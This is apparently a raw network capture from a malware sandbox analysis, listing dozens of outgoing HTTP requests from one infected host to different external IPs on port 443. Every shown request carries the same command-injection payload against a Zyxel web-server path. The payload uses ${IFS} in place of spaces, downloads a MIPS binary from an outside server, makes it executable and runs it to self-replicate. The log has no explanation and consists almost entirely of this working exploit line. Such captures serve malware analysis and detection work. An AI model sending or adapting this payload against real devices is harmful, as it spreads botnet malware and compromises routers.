                                            Jan 14, 2024 15:50:37.375988960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3702192.168.2.2360072134.81.176.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376024961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3703192.168.2.2339410211.225.114.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376039982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3704192.168.2.233284451.241.95.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376090050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3705192.168.2.2357690157.176.210.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376110077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3706192.168.2.235697493.217.138.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376147985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3707192.168.2.2353592192.57.17.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376180887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3708192.168.2.2358420165.22.24.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376209021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3709192.168.2.2336576100.241.182.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376230955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3710192.168.2.235276876.121.67.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376249075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3711192.168.2.235759487.163.42.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376291990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3712192.168.2.234928277.229.113.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376298904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3713192.168.2.2359674203.17.169.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376317978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3714192.168.2.2346602124.17.109.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376333952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3715192.168.2.234646879.73.228.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376363993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3716192.168.2.236016220.139.68.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376396894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3717192.168.2.2334096201.146.83.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376421928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3718192.168.2.234260483.203.114.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376460075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3719192.168.2.235557812.177.103.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376487970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3720192.168.2.2354512216.21.164.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376518965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3721192.168.2.233741837.65.75.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376540899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3722192.168.2.2339926171.221.90.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376545906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3723192.168.2.2342020180.60.68.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376606941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3724192.168.2.2346366149.166.99.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376631975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3725192.168.2.2348426179.229.19.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376641989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3726192.168.2.23485145.98.81.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376661062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3727192.168.2.234823240.106.85.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376699924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3728192.168.2.2342004218.175.70.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376727104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3729192.168.2.2337952209.15.26.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376758099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3730192.168.2.234513647.77.161.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376889944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3731192.168.2.2356264139.120.146.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376909018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3732192.168.2.235094043.93.84.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376943111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3733192.168.2.234804877.26.58.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.376965046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3734192.168.2.234880632.16.50.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377019882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3735192.168.2.234544644.64.107.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377051115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3736192.168.2.2333398165.26.121.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377082109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3737192.168.2.2333108222.121.213.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377101898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3738192.168.2.23410329.76.98.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377132893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3739192.168.2.2351238217.220.215.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377161026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3740192.168.2.2338018190.229.185.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377199888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3741192.168.2.2350482146.66.244.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377242088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3742192.168.2.2348094199.84.93.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377260923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3743192.168.2.233307831.124.153.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377289057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3744192.168.2.235583641.35.141.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377342939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3745192.168.2.2336298196.155.36.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377360106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3746192.168.2.2354536171.240.255.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377376080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3747192.168.2.2355148131.150.8.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377403975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3748192.168.2.235282019.140.34.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377425909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3749192.168.2.233350417.234.17.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377469063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3750192.168.2.2337954158.150.166.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377517939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3751192.168.2.2336326170.125.23.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377568007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3752192.168.2.2358758108.13.228.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377583027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3753192.168.2.235146825.170.56.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377618074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3754192.168.2.234723865.86.218.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377626896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3755192.168.2.234033468.204.186.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377650023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3756192.168.2.233459493.23.210.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377715111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3757192.168.2.2353052122.205.201.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377734900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3758192.168.2.2340464112.110.204.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377767086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3759192.168.2.2353024168.58.125.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377815008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3760192.168.2.234508295.152.39.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377824068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3761192.168.2.235064067.39.149.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377839088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3762192.168.2.234425299.224.49.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377881050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3763192.168.2.234315678.243.227.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377914906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3764192.168.2.2344644149.43.173.42443
                                            TimestampBytes transferredDirectionData
